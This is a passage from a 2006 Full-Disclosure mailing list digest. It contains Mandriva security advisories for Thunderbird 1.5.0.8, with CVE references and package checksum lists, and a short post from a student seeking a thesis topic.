>  71192ef0a8bd28533718191d287d8158  
>corporate/3.0/i586/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.i586.rpm
>  c0121a4a0192d7944b1f8d30c977ab38  
>corporate/3.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.i586.rpm
>  53c403f48cb8547f0eb646ab1b41b656  
>corporate/3.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.i586.rpm
>  032ebcc12942292620b05929e0583f3a  
>corporate/3.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.i586.rpm
>  c88d6e26aa75dab433abcf71f2962e5c  
>corporate/3.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.i586.rpm
>  dcc54cb45829470f4267806696b46eca  
>corporate/3.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.i586.rpm
>  e7ba899422d7cbfd343659b810e4ee52  
>corporate/3.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.i586.rpm
>  d987b44bd201c2a23b404751e13df538  
>corporate/3.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.i586.rpm
>  9d496fa524a5226676f56ed87d2015ec  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.i586.rpm
>  eac64993c47963ede70eca5fb62e30b9  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.i586.rpm
>  b5523fcbf2370d1805e1f917faaa31c8  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.i586.rpm
>  1eb806fe5a429b52f010e16aeed4cb4a  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.i586.rpm
>  1a8da00f3e4033ec813df4548072ac9f  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.i586.rpm
>  3a2434c868a3b5799cb69c31d43f900c  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.i586.rpm
>  a1bb48121d53f83bf0efd303ea477b71  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
>  6f9d308c194ae42cfa0787afdebff2cc  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.i586.rpm
>  bb3c3cf4056814131f8031471c81ac6f  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.i586.rpm
>  4228aaf098c501a80af97469393482b5  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.i586.rpm
>  3a95ad54416e2f002d1aaa32557cf947  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.i586.rpm
>  19e1eac0351d89760ee31b4c9ee4fcc4  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.i586.rpm
>  1c21de0415bd0223237aa82795cc9600  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.i586.rpm
>  a11487e4145c294a57a77491f6996748  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.i586.rpm
>  31064002ac59d4857c3c45c3161580dc  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.i586.rpm
>  fc88eeba422b084ffa67b77211248ef0  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.i586.rpm
>  4ead83e3405e7469370b4f02a9254ddc  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
>  3a15b707a6d7f8e9b25c1ccaea023333  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.i586.rpm
>  1a8c565fd3b42069b2e42103d98dfab2  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.i586.rpm
>  0040d479d7e55304c06df39b2233d12e  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.i586.rpm
>  6fab1321b377748e22a6709b772d5159  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.i586.rpm
>  1969ec5d6cc27df2f09f9733b5b37c6d  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
>  0c34a8e8bd3f9011283fe990771a857a  
>corporate/3.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.i586.rpm
>  68781ca20e2232457046bdab86b59462  
>corporate/3.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
>  37c3909b8feb9a35208519ccf4ec8a46  
>corporate/3.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.i586.rpm
>  ea2febd0e93d9348fd580452f7adc0be  
>corporate/3.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.i586.rpm
>  2eac2aaeb4fe209f98aa85505f6a9b87  
>corporate/3.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.i586.rpm
>  d8d8fc30075f0848859cbe96b26404a7  
>corporate/3.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.i586.rpm
>  3af19a8b01fb316451132e6460c7deb0  
>corporate/3.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.i586.rpm
>  f7aed893e50dff94f47d658d70093824  
>corporate/3.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.i586.rpm
>  ab6ead860edf6de4935aa3bb4ecf4721  
>corporate/3.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.i586.rpm
>  a9b0bc2b2bcf186b5a284cba3d6cad19  
>corporate/3.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.i586.rpm
>  373554b2032c20a61c48f4a4e11e5b57  
>corporate/3.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.i586.rpm
>  1a2efc51627d9f55929e1b33e20f5274  
>corporate/3.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.i586.rpm
>  27ab1d70b317c477b56df8223a8477b4  
>corporate/3.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.i586.rpm
>  0bcd50b34bec84016747f4919b43b8e1  
>corporate/3.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.i586.rpm
>  4b26e1653ccf78604c16b25ed7357dfb  
>corporate/3.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.i586.rpm
>  ea1a0d0349f9a2f26b23c7678d7e5736  
>corporate/3.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.i586.rpm
>  7d7c13e7a820c069b3c657adf57443d9  
>corporate/3.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.i586.rpm
>  ef0755e523de702c802890f494ee5ea0  
>corporate/3.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.i586.rpm
>  f7618d53bff6c0764297f2352c5d0239  
>corporate/3.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
>  8df8db645153b5f7539044d5f892ad54  
>corporate/3.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.i586.rpm
>  d26cb2fbb5301bcf127ea4e4606f52b9  
>corporate/3.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.i586.rpm
>  f57d3dd11471a798542b87f0a3c68e82  
>corporate/3.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.i586.rpm
>  f3aede5440aeb78b59350fe56bb221d2  
>corporate/3.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.i586.rpm
>  bda7588d80565c17190fb407bdc3b1b2  
>corporate/3.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.i586.rpm
>  5f0764d5685d0836bd718fdc86b8a73a  
>corporate/3.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
>  2a1892c7e027dba761df43c98bb5e85f  
>corporate/3.0/i586/nsinstall-1.5.0.8-1.1.C30mdk.i586.rpm
>  04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  
>corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
>  98c5a4c000178cf57677fa6ee70adb71  
>corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>  124ecce0dd9a26b565eef6c2f7e14401  
>corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>
>  Corporate 3.0/X86_64:
>  c109965ada094232d0958a8121be977a  
>corporate/3.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  e50d4054e85e4624b285067c75cfab18  
>corporate/3.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  f8cc5e4a36961ef4db2b8632fc6734d9  
>corporate/3.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  70e0a1878ce810ee835e7eca08a11e12  
>corporate/3.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  50abb11664ca02e6d77cbf30396e5398  
>corporate/3.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  5565876286c51872fb0ff90df059f052  
>corporate/3.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  cdd3892a5ba2a7c1ffe29d009e9d23a9  
>corporate/3.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  ba3e7a92e79e00cd74b722ab94d832eb  
>corporate/3.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  c11927081645df376c72f27e8ebc6a85  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  448172b7c753b48c81b2a2c5d337b9e5  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  b83c0eb2158672f087fd5754ca27efad  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  49b91f3eae7a0773ecce62f635a6dfe9  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  3a0cf5325721e29c4eba9ee7cbc7efb7  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  cadf1aff1e915adb9e14539eb04521db  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  8218118b837bf05b3603652f0d4c5690  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  7c7190fc9ec1fc5774436ec7b0c92fd5  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  a42f63c64470ba933d6239bdf8b1569c  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  af8c5d7e3569278f3e9d364362be25b3  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  c749a5b7ac03ad98919f83425fcbd4c2  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  ac82cd1f4fc0c5ed57be5b165cc65be4  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  0fbd67977bdfc1b1f9aa3c846c80c244  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  4d26f0c7b32d3888e1e5c4c14516a4df  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  37fbc8358f1f11d5cb9f0e9b2fab3b26  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  6bec775a601e84be547246ae5638d059  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  0dc1c40ef6d1a233661048447db25543  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  7ec948cc8df84aae6b3d660bd4187208  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  4b7ba48ffeff51709b26c8f315a4aaa1  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  94fceae9b7bc6d48fe2677eecaaf11a6  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  d578499c38c981f2b8cc55fc1351efef  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  095291274be4a418d05c4e96cb441d90  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  272b554e86966e103d3e7f42b5cba9db  
>corporate/3.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  52bd52c4d5eaad6fa541dd20db5411d0  
>corporate/3.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  2536b28aa209a912ff74601db4e685b4  
>corporate/3.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  484ad35799b9a8cd277754bf1b13d686  
>corporate/3.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  42ff5a3a8320c4be3ffb1f1d74912f78  
>corporate/3.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  8a46a1d9f9380c205699ce090d749ff2  
>corporate/3.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  3c30c5aeee783bfabe34fb1ff7357d38  
>corporate/3.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  a90b14f77d6eed2228bfa55457803f6f  
>corporate/3.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  719239492f7d93b04f2c95902fccf94c  
>corporate/3.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  f52bcdf19f10745e756f0d58616126df  
>corporate/3.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  79826e403152cbe90ddf3bd4d8d64abe  
>corporate/3.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  18c08993c8f43c976be6cf2e8cfb2c35  
>corporate/3.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  b17866029fe4244a77af59fbb55a07b9  
>corporate/3.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  878f59fdb3ebb5929fc23437a17fb5ad  
>corporate/3.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  d62fb25dc173e8b12be8623ae8fbf9bf  
>corporate/3.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  266322718c7cedd78e89524940f15d55  
>corporate/3.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  32c5fcab859aff66aaf704b997a1c625  
>corporate/3.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  17d7eeb0fbd25df1f76d5fa875ef7a3d  
>corporate/3.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  4aabd47a35cb15547ccbe4eda1b521e8  
>corporate/3.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  1d8d27be2902605b0eae9dcbd89654cc  
>corporate/3.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  6c116048a69b3c176831fde5ff0a252a  
>corporate/3.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  e5bcb8518c5a61e63e62f90c363c67ae  
>corporate/3.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  5569afdd940d28bdf37a1003d5d5d6b0  
>corporate/3.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  d00245da432be7a7d268846891555930  
>corporate/3.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  ee130a70f9b1fe5719fea63963f3db6d  
>corporate/3.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  81f41bebeb9eca34d7c27ab81ca41af6  
>corporate/3.0/x86_64/nsinstall-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  
>corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
>  98c5a4c000178cf57677fa6ee70adb71  
>corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>  124ecce0dd9a26b565eef6c2f7e14401  
>corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>  _______________________________________________________________________
>
>  To upgrade automatically use MandrivaUpdate or urpmi.  The verification
>  of md5 checksums and GPG signatures is performed automatically for you.
>
>  All packages are signed by Mandriva for security.  You can obtain the
>  GPG public key of the Mandriva Security Team by executing:
>
>   gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
>  You can view other update advisories for Mandriva Linux at:
>
>   http://www.mandriva.com/security/advisories
>
>  If you want to report vulnerabilities, please contact
>
>   security_(at)_mandriva.com
>  _______________________________________________________________________
>
>  Type Bits/KeyID     Date       User ID
>  pub  1024D/22458A98 2000-07-10 Mandriva Security Team
>   
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.2.2 (GNU/Linux)
>
>iD8DBQFFU42GmqjQ0CJFipgRAiJgAKDQ8K7lgpOsNzXOQcSOrfcVrHQ4sACeLaqm
>75x+jP9FNzlE7ieAV3r7Czs=
>=DdKu
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 2
>Date: Fri, 15 Dec 2006 16:44:44 +0700
>From: "Fajar Edisya Putera" 
>Subject: [Full-disclosure] [OOT] Thesis for master degree
>To: full-disclosure at lists.grok.org.uk
>Message-ID:
>	<828af05c0612150144x5fac7141qee559e4d3abff5b2 at mail.gmail.com>
>Content-Type: text/plain; charset="iso-8859-1"
>
>Hello everyone, sorry for wasting your bandwidth
>
>I'm currently trying to find an interesting topic in computer networking
>security for my master degree thesis, I've read a lot of jurnal that 
>related
>with computer networking and security. All journal seem to advanced for me,
>sometimes the journal has mathematical formula that I don't understand what
>is the point for. Maybe someone here willing to help me? an idea? or 
>another
>journal website?
>
>Thanks
>Sincerely yours
>Fajar
>-------------- next part --------------
>An HTML attachment was scrubbed...
>URL: 
>http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061215/a50fe124/attachment-0001.html
>
>------------------------------
>
>Message: 3
>Date: Fri, 15 Dec 2006 16:10:34 -0700
>From: security at mandriva.com
>Subject: [Full-disclosure] [ MDKSA-2006:206 ] - Updated Thunderbird
>	packages	fix multiple vulnerabilities
>To: full-disclosure at lists.grok.org.uk
>Message-ID: 
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>  _______________________________________________________________________
>
>  Mandriva Linux Security Advisory                         MDKSA-2006:206
>  http://www.mandriva.com/security/
>  _______________________________________________________________________
>
>  Package : mozilla-thunderbird
>  Date    : November 9, 2006
>  Affected: 2007.0, Corporate 3.0
>  _______________________________________________________________________
>
>  Problem Description:
>
>  A number of security vulnerabilities have been discovered and corrected
>  in the latest Mozilla Thunderbird program, version 1.5.0.8.
>
>  This update provides the latest Thunderbird to correct these issues.
>  _______________________________________________________________________
>
>  References:
>
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5463
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5464
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5747
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5748
>  http://www.mozilla.org/security/announce/2006/mfsa2006-65.html
>  http://www.mozilla.org/security/announce/2006/mfsa2006-66.html
>  http://www.mozilla.org/security/announce/2006/mfsa2006-67.html
>  _______________________________________________________________________
>
>  Updated Packages:
>
>  Mandriva Linux 2007.0:
>  488e65dfe45ecf7e3a9e1a3dedd5c2ce  
>2007.0/i586/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.i586.rpm
>  5e551ab45061148722dda1d7ce66959e  
>2007.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.i586.rpm
>  2149a7fd629b8bc6843c6fdf1bb49efb  
>2007.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
>  0d2315b490e3b8dd2ab791bd6c3ee516  
>2007.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
>  d5583d1b99b948c90e1cad62d753d67d  
>2007.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.i586.rpm
>  00ec607c39d3de4c589997d6c7ee6679  
>2007.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6d1f0f2576362a0bb90b4f9d8c4f2153  
>2007.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.i586.rpm
>  2cb0e44d2e3f7fddd60249843204403f  
>2007.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.i586.rpm
>  0c3c771882698d5651775aeed24bfd73  
>2007.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.i586.rpm
>  477ca905391c1d555d0136d46d557869  
>2007.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
>  741811dd392d942b27e1b3b0de695d4e  
>2007.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
>  7c2c4922c6a2c6ce2cb6108a95f7dbfa  
>2007.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.i586.rpm
>  7cbf9f3218d587ef97edf01f2298096b  
>2007.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.i586.rpm
>  7dbd9e4c16db82a761a7b502c1f7f22d  
>2007.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.i586.rpm
>  b6dd6119216f6b748ee7c1570c3b8c37  
>2007.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  1eea732e08ca0ef96796c3f50abb1f77  
>2007.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e1cc5cf2496581d776bb43e2f0dbbea6  
>2007.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
>  af86ce82ff9053250f82f2215c8dd7e5  
>2007.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6319633c561c7f68c6614685126da02b  
>2007.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.i586.rpm
>  56387829c6cc83882246e68e3b8704b0  
>2007.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
>  56cb838bb0c375f53d3cff2eb76a1118  
>2007.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
>  253500598ff56ab85394e68708ace21d  
>2007.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  53b4d4f1aa4e8174a33a0ed436ce961a  
>2007.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  fb9dd6933d27029538cd01a64ec55cee  
>2007.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.i586.rpm
>  701b9837303a3ed79e6c74c037c28926  
>2007.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  b3739c1344770e92864c50f131f08884  
>2007.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
>  1efe7ebc2a71e2f2d6c2785026a6e7ac  
>2007.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6860352b37999652aab785a266673e2f  
>2007.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  51abe323b14793097935b0c221e64f71  
>2007.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
>  b8ec884437a460c9fbb5c71db6a46c31  
>2007.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  9ae4fb1871ee29f3f7b52210c0cf4e1b  
>2007.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e1a31b03ffef8e86df09579296fce3c9  
>2007.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6b4bdbb4648231b128655e56015621c7  
>2007.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.i586.rpm
>  d333252ee1ba51351762e4050565ecb1  
>2007.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
>  0a2828dbab70a2be0e721cc016f93d7f  
>2007.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
>  defa2ac291c66f693946362bd2501c40  
>2007.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.i586.rpm
>  c5540aa8289eefbf3e708e442de77aa8  
>2007.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  45da9968c4661ef994ef1dcefd0ad54f  
>2007.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.i586.rpm
>  df8d2ea1013a65457aa1f2100060d968  
>2007.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
>  f87f2441b2ca36d4f5c3f3f2dd04b3bb  
>2007.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.i586.rpm
>  bc3a281fbc5c09b7f962dfb1d3b9e517  
>2007.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
>  2563050985477697472069d08e96de0f  
>2007.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e22be985ae58ab3eba5b90aa6a3eb58e  
>2007.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.i586.rpm
>  fde0d1b9c4feee3c1e239345f4065090  
>2007.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.i586.rpm
>  10be2386887a6c70bc4f9c0453b33072  
>2007.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
>  1c92d5ee79fc52ec1525f3c96dfa1916  
>2007.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  42e6ddb4a33a297c71b996bf651a4d69  
>2007.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  96394d1245284a886b954bb063c0ab5b  
>2007.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  8386317130e064260bd8b114616410ed  
>2007.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  eb622e8adc0767e090a608e80a1611b7  
